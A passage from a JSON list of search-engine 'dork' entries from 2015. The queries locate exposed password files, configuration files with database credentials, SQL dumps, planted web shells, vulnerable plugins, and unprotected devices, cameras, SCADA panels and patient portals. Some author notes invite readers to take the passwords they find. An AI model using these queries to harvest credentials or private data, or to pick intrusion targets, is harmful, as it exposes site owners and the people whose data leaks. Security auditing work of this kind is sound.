Have Fun.By Rootkit.", "submited": "2015-06-23", "request": "ext:asp intext:Smart.Shell 1.0 BY P0Uy@_$3r\\/3R -", "id": 4023}, {"short description": "filetype:asmx inurl:(_vti_bin|api|webservice)", "long description": "this dork will return web service .", "submited": "2015-06-23", "request": "filetype:asmx inurl:(_vti_bin|api|webservice)", "id": 4024}, {"short description": "inurl:Citrix/MetaframeXP", "long description": "Servers Citrix web xD.By Rootkit.", "submited": "2015-06-24", "request": "inurl:Citrix/MetaframeXP", "id": 4025}, {"short description": "\"signons.sqlite\" intitle:\"index of\"", "long description": "\"signons.sqlite\" intitle:\"index of\"This dork finds firefox profiles and other softwares that use the similarformat that you can grab and put in your own firefox or other installationand reveal all passwords saved, history, bookmarks, saved cookies andpretty much everything! When you get hacked using this method it feels likeyou are getting hacked by a whole team.by _sNapper--\"The answer to every problem is One.\" -- Myself--\"Life is like war, for the most part--planning it is useless.\" -- Myself", "submited": "2015-06-24", "request": "\"signons.sqlite\" intitle:\"index of\"", "id": 4026}, {"short description": "intitle:\"Index of\" \"wwwroot\"", "long description": "Directory of wwwroot Dork. 
Enjoy xD.By Rootkit.", "submited": "2015-06-30", "request": "intitle:\"Index of\" \"wwwroot\"", "id": 4027}, {"short description": "\"Futon on Apache\" inurl:_utils", "long description": "Exposed CouchDB admin panelsBy Gabor Szathmari", "submited": "2015-06-30", "request": "\"Futon on Apache\" inurl:_utils", "id": 4028}, {"short description": "phpMyAdmin SQL Dump", "long description": "# Exploit Title: [phpMyAdmin SQL Dump]# Google Dork: [intext:SET SQL_MODE=\"NO_AUTO_VALUE_ON_ZERO\"; = ext:txt]# Date: [6/29/2015]# Exploit Author: [Daz Holmes]", "submited": "2015-06-30", "request": "phpMyAdmin SQL Dump", "id": 4029}, {"short description": "site:pastebin.com intext:Username", "long description": "# Exploit Title: [site:pastebin.com intext:Username]# Google Dork: [Pastebin Username & Password]# Date: [6/29/2015]# Exploit Author: [Daz Holmes]", "submited": "2015-06-30", "request": "site:pastebin.com intext:Username", "id": 4030}, {"short description": "inurl:access.cnf ext:cnf", "long description": "File vulnerability, reveals the path of Password Server. 
Have fun.This Dork is present By Rootkit.", "submited": "2015-07-08", "request": "inurl:access.cnf ext:cnf", "id": 4031}, {"short description": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "long description": "Google dork Description: MySQL dumpGoogle search: intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txtby TN-N3SQU1K :)", "submited": "2015-07-08", "request": "intext:OLD_FOREIGN_KEY_CHECKS\"; = ext:txt", "id": 4032}, {"short description": "intitle:index.of.pubs", "long description": "Exploit title: intitle:index.of.pubsDescription: intitle:index.of.pubsSensitive DirectoriesAuthor:fidah.org", "submited": "2015-07-09", "request": "intitle:index.of.pubs", "id": 4033}, {"short description": "inurl:\"/certsrv\" intext:\"Select a task\"", "long description": "Microsoft Certificate Request Webpage.Author: Felipe Molina (@felmoltor)", "submited": "2015-07-09", "request": "inurl:\"/certsrv\" intext:\"Select a task\"", "id": 4034}, {"short description": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "long description": "Identifies Accellion Secure File Transfer servers that may be vulnerable tohttps://community.rapid7.com/community/metasploit/blog/2015/07/10/r7-2015-08-accellion-file-transfer-appliance-vulnerabilities-cve-2015-2856-cve-2015-2857@lanmaster53", "submited": "2015-07-14", "request": "inurl:courier/web/ inurl:wmLogin.html filetype:html", "id": 4035}, {"short description": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "long description": "Dork Identifies the sites with ApPHP-Hotel-Site 3.x.x vulnerable to sqlinjection.https://packetstormsecurity.com/files/132369/ApPHP-Hotel-Site-3.x.x-SQL-Injection.htmlRegards,Karan Ramani", "submited": "2015-07-21", "request": "inurl:\"index.php\" intext:\"ApPHP Hotel Site\" -site:\"apphp.com\"", "id": 4036}, {"short description": "allinurl:awstats.pl ext:pl", "long description": "A lot of Panels with Statics Advanced. 
Enjoy.By Rootkit.", "submited": "2015-07-22", "request": "allinurl:awstats.pl ext:pl", "id": 4037}, {"short description": "inurl:EndUserPortal.jsp", "long description": "inurl:EndUserPortal.jspIt takes you it brings up login pages for the service desk.https://www.exploit-db.com/exploits/37667/Author: NumLock90", "submited": "2015-07-23", "request": "inurl:EndUserPortal.jsp", "id": 4038}, {"short description": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "long description": "The dork 'inurl:wp-admin/admin-ajax.php inurl:wp-config.php' finds the'wp-config.php' file. It contains information about the database,including the name, host (typically localhost), username, and password.This information allows WordPress to communicate with the database to storeand retrieve data (e.g. Posts, Users, Settings, etc).Name: Suyog Pawar.", "submited": "2015-07-27", "request": "inurl:wp-admin/admin-ajax.php inurl:wp-config.php", "id": 4039}, {"short description": "intext:@pwcache \"parent directory\"", "long description": "intext:@pwcache \"parent directory\"Best regards,Adam Bedard", "submited": "2015-07-27", "request": "intext:@pwcache \"parent directory\"", "id": 4040}, {"short description": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "long description": "InterWorx Web Hosting Control Panel login pages.- Andy G - twitter.com/vxhex", "submited": "2015-07-27", "request": "intitle:\"InterWorx-CP\" \"Forgot your password\"", "id": 4041}, {"short description": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "long description": "*Google Search : site:.mil + inurl:login.aspx | .asp | .html | .php | .htmZeel Chavda", "submited": "2015-07-27", "request": "site:.mil + inurl:login.aspx | .asp | .html | .php | .htm", "id": 4042}, {"short description": "allinurl:foldercontent.html?folder=", "long description": "Devices of NAS Iomega Cloud Services.Enjoy!!!.By Rootkit.", "submited": "2015-07-28", "request": "allinurl:foldercontent.html?folder=", "id": 4043}, 
{"short description": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "long description": "www.exploit-db.com/exploits/37275/Dork: inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/sincerely,Zeel Chavda", "submited": "2015-08-10", "request": "inurl:/plugins/aviary-image-editor-add-on-for-gravity-forms/", "id": 4044}, {"short description": "inurl:/wp-content/plugins/inboundio-marketing/", "long description": "https://www.exploit-db.com/exploits/36478/Google Dork : inurl:/wp-content/plugins/inboundio-marketing/sincerely,Zeel Chavda", "submited": "2015-08-10", "request": "inurl:/wp-content/plugins/inboundio-marketing/", "id": 4045}, {"short description": "intext:index of sym", "long description": "Dork: intext:index of symMost of hacker use auto server symlink script and grab all the config fileof the server. Most of the script create a folder that name is sym. Allconfig file stored in this folder.Thank YouAtik Rahman", "submited": "2015-08-10", "request": "intext:index of sym", "id": 4046}, {"short description": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "long description": "Files containing Juicy information from web online tools for generating .htpasswd and giving full web path .by - l1kw1d", "submited": "2015-08-10", "request": "intext:\"Full path to a .htpasswd file in this dir:\" filetype:php", "id": 4047}, {"short description": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "long description": "List of Directories of Unix and Linux webs.Enjoy!.By Rootkit.", "submited": "2015-08-12", "request": "inurl:cgi-bin ext:pl intext:\"-rwxr-xr-x\"", "id": 4048}, {"short description": "allinurl:wp-content/plugins/wptf-image-gallery/", "long description": "Description:- Aribtrary File Download Vuln.Exploit :- www.exploit-db.com/exploits/37751/Google :- allinurl:wp-content/plugins/wptf-image-gallery/Sincerely,Zeel Chavda", "submited": "2015-08-12", "request": "allinurl:wp-content/plugins/wptf-image-gallery/", "id": 4049}, 
{"short description": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "long description": "Search the Sarg monitoring graphs of Web Proxy SQUID3Ing. Daniel Maldonadohttp://www.caceriadespammers.com.ar", "submited": "2015-08-17", "request": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "id": 4050}, {"short description": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "long description": "# Exploit Title: Unprotected HP Laserjets# Google Dork: intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm# Date: 15/08/2015# Exploit Author: AnonymousChange default password or add your own password as the printers come without a password which allows others to mess with settings and print various things.", "submited": "2015-08-17", "request": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "id": 4051}, {"short description": "intext:/homedir/.cpanel-datastore/", "long description": "intext:/homedir/.cpanel-datastore dork displays publicly accessible andindexed cpanel datastores.Enjoy, Zapperlink", "submited": "2015-08-17", "request": "intext:/homedir/.cpanel-datastore/", "id": 4052}, {"short description": "intext:bbdd index.of \"/\" \"Parent Directory\"", "long description": "Databases directory info. Have Fun!Rootkit.", "submited": "2015-08-17", "request": "intext:bbdd index.of \"/\" \"Parent Directory\"", "id": 4053}, {"short description": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "long description": "Google Dork that brings up ddos shell", "submited": "2015-08-18", "request": "intitle:SN0X SHELL: WEEEEEEEEEEEEEEEEED", "id": 4054}, {"short description": "filetype:pac inurl:\"/proxy\"", "long description": "Search the Web Proxy Autodiscovery ProtocolIng. 
Daniel Maldonadohttp://www.caceriadespammers.com.ar", "submited": "2015-08-18", "request": "filetype:pac inurl:\"/proxy\"", "id": 4055}, {"short description": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "long description": "This Error messages reveal a lot of info of servers. Enjoy xD.Rootkit Pentester.", "submited": "2015-08-19", "request": "intext:\"Unexpected Problem Occurred!\" ext:aspx", "id": 4056}, {"short description": "intitle:\"Index of\" \"DCIM\"", "long description": "A lot of Camera Photos Dump.Have Fun!.Rootkit.", "submited": "2015-08-19", "request": "intitle:\"Index of\" \"DCIM\"", "id": 4057}, {"short description": "inurl: mil|/issue.php filetype:xls", "long description": "Files containing juicy info of the involved current issuersAuthor : aye_robot", "submited": "2015-08-21", "request": "inurl: mil|/issue.php filetype:xls", "id": 4058}, {"short description": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "long description": "Type: login portalsAuthor : botsec0", "submited": "2015-08-24", "request": "site: edu|org + inurl:\"faculty_login.asp | .php\"", "id": 4059}, {"short description": "intitle:\"Index of\" \"WhatsApp Images\"", "long description": "WhatsApp Images folder, usually from backups.--pmbento", "submited": "2015-08-24", "request": "intitle:\"Index of\" \"WhatsApp Images\"", "id": 4060}, {"short description": "inurl:/set_config_password.html", "long description": "Submitter: Gman The Mod-dog", "submited": "2015-08-24", "request": "inurl:/set_config_password.html", "id": 4061}, {"short description": "intitle:Error Page pageWrapper.jsp?", "long description": "\"java.lang.NullPointerException\" ErrorThanks,Xploit", "submited": "2015-08-27", "request": "intitle:Error Page pageWrapper.jsp?", "id": 4062}, {"short description": "intitle:IBM Lotus iNotes Login", "long description": "Thanks,Xploit", "submited": "2015-08-27", "request": "intitle:IBM Lotus iNotes Login", "id": 4063}, {"short description": 
"inurl:src/viewcvs.cgi/log/.c?=", "long description": "Vulnerable CVS logs", "submited": "2015-08-27", "request": "inurl:src/viewcvs.cgi/log/.c?=", "id": 4064}, {"short description": "intitle:Error-javax.el.ELException+error+xhtml", "long description": "An Error Occurred:\" javax.el.ELException\"Java error and gives", "submited": "2015-08-28", "request": "intitle:Error-javax.el.ELException+error+xhtml", "id": 4065}, {"short description": "\"ganglia mobile.php\"", "long description": "EDB: https://www.exploit-db.com/exploits/38030/CVE: CVE-2012-3448Also:intitle:\"Ganglia Mobile\"intitle:\"Ganglia\" inurl:\"mobile.php\"intitle:\"Grid Report\" OR intitle:\"Cluster Report\" OR intitle:\"Node View\" OR intitle:\"Host Report\" OR intitle:\"Ganglia:: \"intitle:\"Powered by Job Monarch\"intext:\"Job Monarch version \"intext:\"Jobarchive\" intext:\"runningtime\"inurl:\"/addons/job_monarch\" -oss.trac.surfsara.nl\"Ganglia Web Frontend version 3.5.0\" - Comment: just tweak the version 3.5.0 to any valid Ganglia Web Frontend version to get results targeted to a specific version.", "submited": "2015-09-01", "request": "\"ganglia mobile.php\"", "id": 4066}, {"short description": "inurl:\"/cms/app/webroot\"", "long description": "inurl:\"/cms/app/webroot\"Author:ShockvaWe (mrnoone)ozum", "submited": "2015-09-01", "request": "inurl:\"/cms/app/webroot\"", "id": 4067}, {"short description": "intitle:\"IPCam\" inurl:monitor2.htm", "long description": "EasyN IP webcam WebUI.Category: Various Online devices- Fitzl Csaba", "submited": "2015-09-02", "request": "intitle:\"IPCam\" inurl:monitor2.htm", "id": 4068}, {"short description": "inurl:browse.php inurl:kcfinder -github.com", "long description": "Panels of files for kcfinder Software. 
Have fun!.Dork by Rootkit Pentester.", "submited": "2015-09-02", "request": "inurl:browse.php inurl:kcfinder -github.com", "id": 4069}, {"short description": "inurl:xampp inurl:perlinfo.pl ext:pl", "long description": "Panels with a lot of data for webservers.Dork by Rootkit Pentester.", "submited": "2015-09-02", "request": "inurl:xampp inurl:perlinfo.pl ext:pl", "id": 4070}, {"short description": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "long description": "Dork :site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backupThis Will help to grab the Backup and old file of the (.gov and .edu)Website'sBy : Mishra Dhiraj (D)", "submited": "2015-09-02", "request": "site:.edu | .gov ext:bkf | ext:bkp | ext:bak | ext:old | ext:backup", "id": 4071}, {"short description": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "long description": "Dork;site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:iniThis dork will search for any configuration files a target or targets mayhave.You can change in site:target.com - to target:edu (for education targets)By Kevin Mark", "submited": "2015-09-07", "request": "site:target.com ext:xml | ext:conf | ext:cnf | ext:reg | ext:inf | ext:rdp | ext:cfg | ext:txt | ext:ora | ext:ini", "id": 4072}, {"short description": "intitle:\"Index of\" \"WhatsApp Databases\"", "long description": "this dork find db.crypt/.db files of whatsapp conversationsyou can open them withhttps://code.google.com/p/hotoloti/downloads/detail?name=Whatsapp_Xtract_V2.1_2012-05-10-2.zip&thanks to pmbento--acid_burn9X", "submited": "2015-09-07", "request": "intitle:\"Index of\" \"WhatsApp Databases\"", "id": 4073}, {"short description": "intitle:Logon OrderCloud ui/logon.aspx", "long description": "Four51 OrderCloud Company cloud software.OrderCloud for shopping websites Login.-Xploit", "submited": 
"2015-09-07", "request": "intitle:Logon OrderCloud ui/logon.aspx", "id": 4074}, {"short description": "inurl:\"/wap/LoginPolicy.jsp\"", "long description": "Stoneware webnetwork CloudAllows for Portal Cloud login.-Xploit", "submited": "2015-09-07", "request": "inurl:\"/wap/LoginPolicy.jsp\"", "id": 4075}, {"short description": "inurl:\"remote.php/webdav\" -site:owncloud.org", "long description": "Category: Pages Containin Login PortalsAuthor: Felipe Molina (@femoltor)Owncloud WebDav login", "submited": "2015-09-10", "request": "inurl:\"remote.php/webdav\" -site:owncloud.org", "id": 4076}, {"short description": "intitle:\"Index.of\" \"attachments\"", "long description": "Directories with interesting info.Have Fun Responsible.Dork by Rootkit Pentester.", "submited": "2015-09-10", "request": "intitle:\"Index.of\" \"attachments\"", "id": 4077}, {"short description": "intitle:\"Whoops! There was an error.\"", "long description": "These error pages can contain database credentials.contact: @geoffreyvdberge", "submited": "2015-09-11", "request": "intitle:\"Whoops! 
There was an error.\"", "id": 4078}, {"short description": "inurl:sh311Z/c99/", "long description": "Through this shell you can find c99 shells uploaded on websites", "submited": "2015-09-15", "request": "inurl:sh311Z/c99/", "id": 4079}, {"short description": "intitle:\"WebService Web Service\" ext:asmx", "long description": "Servers with \"Web Service commands activated\".Dork by Rootkit Pentester.", "submited": "2015-09-15", "request": "intitle:\"WebService Web Service\" ext:asmx", "id": 4080}, {"short description": "intitle:Content Server Error IdcService=DOC_INFO", "long description": "Oracle WebCenter ContentContent Server Error-Xploit", "submited": "2015-09-17", "request": "intitle:Content Server Error IdcService=DOC_INFO", "id": 4081}, {"short description": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "long description": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"Here is a list of files and directories in your public_html folder, it bypass directory-listening restriction.Silent_z3r0Pakistan Cyber Army", "submited": "2015-09-17", "request": "inurl:\"default.php\" intext:\"website\" \"has been successfully installed on the server!\"", "id": 4082}, {"short description": "site:ws.kik.com | site:ws2.kik.com k=", "long description": "Google Dork: site:ws.kik.com | site:ws2.kik.com k=Date: September 16th, 2015Exploit Author: Matthew BlankenshipDescription: Shows usernames, emails, and verification tokens for kik messenger accounts.", "submited": "2015-09-18", "request": "site:ws.kik.com | site:ws2.kik.com k=", "id": 4083}, {"short description": "inurl:printer/main.html", "long description": "This Dork reveals a lot of Printers Panels.Enjoy with moderation xD.This Dork is discovered by Rootkit Pentester.", "submited": "2015-09-24", "request": "inurl:printer/main.html", "id": 4084}, {"short description": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", 
"long description": "Oracle PeopleSoft Sign-inLogins-Xploit", "submited": "2015-09-28", "request": "intitle:Oracle PeopleSoft Sign-in \"Oracle\" Sign-in \"error\"", "id": 4085}, {"short description": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "long description": "Mail :: Welcome to HordeGives usernames on Horde email websites and other email websites as well.-Xploit", "submited": "2015-10-05", "request": "inurl:imapuser Mail :: Welcome to Horde imp login.php password", "id": 4086}, {"short description": "intitle:Global Traffic Statistics \"Ntop\"", "long description": "Google dork Description: View Global Traffic StatisticsGoogle search: intitle:Global Traffic Statistics \"Ntop\"Submited: 2015-10-3Note:Ntop shows the current network usage. It displays a list of hosts thatare currently using the network and reports information concerning theIP (Internet Protocol) traffic generated by each host.", "submited": "2015-10-05", "request": "intitle:Global Traffic Statistics \"Ntop\"", "id": 4087}, {"short description": "inurl:axis.cgi ext:cgi", "long description": "Dork for all axis cams. Enjoy with them!.These Dork is Discovered by Rootkit Pentester.", "submited": "2015-10-06", "request": "inurl:axis.cgi ext:cgi", "id": 4088}, {"short description": "inurl:webvisu.htm ext:htm", "long description": "Google dork Description: View SCADA web visual interfaceGoogle search: inurl:webvisu.htm ext:htmSubmited: 2015-10-8Note:SCADA web visual. 
- Yudha[at]glosmon.com", "submited": "2015-10-15", "request": "inurl:webvisu.htm ext:htm", "id": 4089}, {"short description": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "long description": "Login for Parallels Plesk Panel for Microsoft Windows-Xploit", "submited": "2015-10-15", "request": "intitle:Parallels Plesk Panel for Microsoft Windows /login_up.php3", "id": 4090}, {"short description": "inurl:agc/vicidial.php", "long description": "This reveals the version of vicidial used and gives the access changing to/agc/vicidial.php to vicidial/admin.php to give the direct access to adminlogin page .", "submited": "2015-10-15", "request": "inurl:agc/vicidial.php", "id": 4091}, {"short description": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "long description": "JBoss Application Server Info-Xploit", "submited": "2015-10-15", "request": "inurl:\"/web-console/\" intitle:\"Administration Console\"", "id": 4092}, {"short description": "mail spool intitle:index.of", "long description": "Dork for mail spools.Decoy", "submited": "2015-10-16", "request": "mail spool intitle:index.of", "id": 4093}, {"short description": "private parent intitle:index.of", "long description": "http://www.google.com/search?q=private parent intitle:index.ofDork for all sorts of juicy stuff!Decoy", "submited": "2015-10-16", "request": "private parent intitle:index.of", "id": 4094}, {"short description": "inurl:users intitle:index.of", "long description": "http://www.google.com/search?q=inurl:users intitle:index.ofUser folders containing interesting files.Decoy", "submited": "2015-10-16", "request": "inurl:users intitle:index.of", "id": 4095}, {"short description": "inurl:/my.logon.php3?", "long description": "f5 Network Remote Access Logins-Xploit", "submited": "2015-10-16", "request": "inurl:/my.logon.php3?", "id": 4096}, {"short description": "inurl:.listing intitle:index.of", "long description": "Directories with .listing files.By Rootkit Pentester.", 
"submited": "2015-10-19", "request": "inurl:.listing intitle:index.of", "id": 4097}, {"short description": "inurl:.DS_Store intitle:index.of", "long description": "Directories with DS_Store files.By Rootkit Pentester.", "submited": "2015-10-19", "request": "inurl:.DS_Store intitle:index.of", "id": 4098}, {"short description": "inurl:/aspnet_client/system_web/", "long description": "Google dork Description: Juice Directory \"ASP\"Google search: inurl:/aspnet_client/system_web/Note:Juice Directory. - Yudha[at]glosmon.com", "submited": "2015-10-19", "request": "inurl:/aspnet_client/system_web/", "id": 4099}, {"short description": "\"sql\" \"parent\" intitle:index.of -injection", "long description": "Directories containing SQL Installs and/or SQL databases...Decoy", "submited": "2015-10-20", "request": "\"sql\" \"parent\" intitle:index.of -injection", "id": 4100}, {"short description": "inurl:cgi-bin/webproc?getpage=", "long description": "inurl:cgi-bin/webproc?getpage=https://www.exploit-db.com/exploits/38488/By JeJe Plus", "submited": "2015-10-20", "request": "inurl:cgi-bin/webproc?getpage=", "id": 4101}, {"short description": "filetype:log intext:password | pass | pw", "long description": "http://www.google.com/search?q=filetype:log intext:password | pass | pwLog files containing passwords...Decoy", "submited": "2015-10-22", "request": "filetype:log intext:password | pass | pw", "id": 4102}, {"short description": "\"My Documents\" \"parent\" intitle:index.of", "long description": "http://www.google.com/search?q=\"My Documents\" \"parent\" intitle:index.of\"My Documents\" folders shared on the interwebs...Decoy", "submited": "2015-10-22", "request": "\"My Documents\" \"parent\" intitle:index.of", "id": 4103}, {"short description": "\"Desktop\" parent intitle:index.of", "long description": "http://www.google.com/search?q=\"Desktop\" parent intitle:index.ofDesktops shared on the interwebs...Decoy", "submited": "2015-10-22", "request": "\"Desktop\" parent 
intitle:index.of", "id": 4104}, {"short description": "inurl:webgps intitle:\"GPS Monitoring System\"", "long description": "Login page for GPS monitoring systems.Author: Manuel Mancera (sinkmanu)", "submited": "2015-10-26", "request": "inurl:webgps intitle:\"GPS Monitoring System\"", "id": 4105}, {"short description": "inurl:etc -intext:etc ext:passwd", "long description": "Files with a lot of passwords. Enjoy healthy!.Dork by Rootkit Pentester.", "submited": "2015-10-28", "request": "inurl:etc -intext:etc ext:passwd", "id": 4106}, {"short description": "intitle:index.of parent inurl:repos", "long description": "http://www.google.com/search?q=intitle:index.of parent inurl:reposShared repositories. Very interesting...Decoy", "submited": "2015-10-30", "request": "intitle:index.of parent inurl:repos", "id": 4107}, {"short description": "intitle:index.of inurl:grades site:edu", "long description": "Directories containing grades.Decoy", "submited": "2015-11-02", "request": "intitle:index.of inurl:grades site:edu", "id": 4108}, {"short description": "\"Build ref: 26\"", "long description": "Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)CamerasGoogle Search: \"Build ref: 26\"Vendor: PIPS Technology (3M)http://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technologyListing of ANPRs/ALPRs cameras.John Jolly", "submited": "2015-11-03", "request": "\"Build ref: 26\"", "id": 4109}, {"short description": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "long description": "Search for all websites built on specific versions of Joomla CMS . 
Thesespecific versions of Joomla could potentially be vulnerableto the SQL injection attack (CVE-2015-7297) .ThanksDheerajhttps://www.linkedin.com/in/dheerajrnhttps://www.facebook.com/dheeraj.pro", "submited": "2015-11-03", "request": "\"powered by joomla 3.2\" OR \"powered by joomla 3.3\" OR \"powered by joomla 3.4\"", "id": 4110}, {"short description": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "long description": "Apache Solr admin interfaces.- Andy G - twitter.com/vxhex", "submited": "2015-11-05", "request": "intitle:\"Solr Admin\" \"Core Admin\" \"Thread Dump\"", "id": 4111}, {"short description": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "long description": "Dork who collects a lot of data in excel file.By Rootkit Pentester.", "submited": "2015-11-06", "request": "ext:xls intext:NAME intext:TEL intext:EMAIL intext:PASSWORD", "id": 4112}, {"short description": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "long description": "Sites with openwebmail installs.Decoy", "submited": "2015-11-09", "request": "intitle:index.of inurl:openwebmail -site:openwebmail.org", "id": 4113}, {"short description": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "long description": "Patient Health Portals.Decoy", "submited": "2015-11-09", "request": "inurl:portal | intitle:portal (\"login\" | \"logon\" | \"admin\") inurl:patient | intitle:patient", "id": 4114}, {"short description": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "long description": "Content Manager Login Pages.Decoy", "submited": "2015-11-09", "request": "inurl:\"http://cms\" | inurl:\"https://cms\" (\"login\" | \"logon\" | \"admin\") -school", "id": 4115}, {"short description": "intitle:\"SmarterMail Login\" inurl:\"/Login.aspx\"", "long description": "Login for SmarterMail Enterprise-Xploit", "submited": "2015-11-10", "request": "intitle:\"SmarterMail Login\" 
inurl:\"/Login.aspx\"", "id": 4116}, {"short description": "intitle:\"Dashboard [Jenkins]\" Credentials", "long description": "Find Jenkins websites which do not require authentication to possiblyretrieve credentials and obtain remote command execution.Vulnerability: http://www.th3r3p0.com/vulns/jenkins/jenkinsVuln.html- Th3R3p0", "submited": "2015-11-10", "request": "intitle:\"Dashboard [Jenkins]\" Credentials", "id": 4117}, {"short description": "inurl:\"wp-content/uploads/private\"", "long description": "Directories with juicy data.Dork by Rootkit Pentester.", "submited": "2015-11-11", "request": "inurl:\"wp-content/uploads/private\"", "id": 4118}, {"short description": "ext:sql intext:username intext:password", "long description": "search turns up database files with cleartext and encryption, often leadingto open directory structures and configuration files.", "submited": "2015-11-11", "request": "ext:sql intext:username intext:password", "id": 4119}, {"short description": "inurl:pipermail intitle:index.of parent", "long description": "Pipermail ArchivesDecoy", "submited": "2015-11-11", "request": "inurl:pipermail intitle:index.of parent", "id": 4120}, {"short description": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "long description": "Blackboard Login Portals.Decoy", "submited": "2015-11-11", "request": "inurl:\"https://blackboard\" | inurl:\"http://blackboard\"", "id": 4121}, {"short description": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "long description": "Canvas login portals.Decoy", "submited": "2015-11-11", "request": "inurl:\"http://canvas\" | inurl:\"https://canvas\" | intitle:\"Log In to Canvas\"", "id": 4122}, {"short description": "intext:smtp | pop3 intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "long description": "Spreadsheets with pop3 and smtp login details.Decoy", "submited": "2015-11-11", "request": "intext:smtp | pop3 intext:login | logon 
intext:password | passcode filetype:xls | filetype:xlsx", "id": 4123}, {"short description": "inurl:\"ftp\" intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" |\"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "long description": "Passwords :DDecoy", "submited": "2015-11-11", "request": "inurl:\"ftp\"\n intext:\"user\" | \"username\" | \"userID\" | \"user ID\" | \"logon\" | \"login\" intext:\"password\" | \"passcode\" filetype:xls | filetype:xlsx", "id": 4124}, {"short description": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "long description": "WinOcular Workspace Login portals.Decoy", "submited": "2015-11-11", "request": "intitle:\"Workspace Login\" intext:\"WinOcular WorkSpace\"", "id": 4125}, {"short description": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "long description": "Files with Passwords of http and https servers in format xls and xlsx.Enjoy well.Dork By Rootkit Pentester.", "submited": "2015-11-12", "request": "intext:http | https intext:login | logon intext:password | passcode filetype:xls | filetype:xlsx", "id": 4126}, {"short description": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "long description": "Google dork Description: bypass information Apache Hadoop ServiceGoogle search: intext:\"This is Apache Hadoop release\" \"Local Logs\"Submited: 2015-11-12Note:view Hadoop information. 
- Yudha[at]glosmon.com", "submited": "2015-11-12", "request": "intext:\"This is Apache Hadoop release\" \"Local Logs\"", "id": 4127}, {"short description": "intitle:\"router\"inurl:\"home.asp\"", "long description": "Few routers that can be accessed without login", "submited": "2015-11-12", "request": "intitle:\"router\"inurl:\"home.asp\"", "id": 4128}, {"short description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "long description": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php| inurl:.us/wp-login.php", "submited": "2015-11-13", "request": "inurl:.gov/wp-login.php | inurl:.edu/wp-login.php | inurl:.mil/wp-login.php | inurl:.us/wp-login.php", "id": 4129}, {"short description": "intitle:AP Router New Generation | inurl:/home.asp", "long description": "Access Point Router Logins-Xploit", "submited": "2015-11-13", "request": "intitle:AP Router New Generation | inurl:/home.asp", "id": 4130}, {"short description": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "long description": "Servers with vulnerability who exploit in this link:https://www.exploit-db.com/exploits/13850/Dork by Rootkit Pentester.", "submited": "2015-11-13", "request": "\" Proudly Served by LiteSpeed Web Server\" intitle:index.of./", "id": 4131}, {"short description": "intitle:index.of.mail", "long description": "Dork with juicy info. 
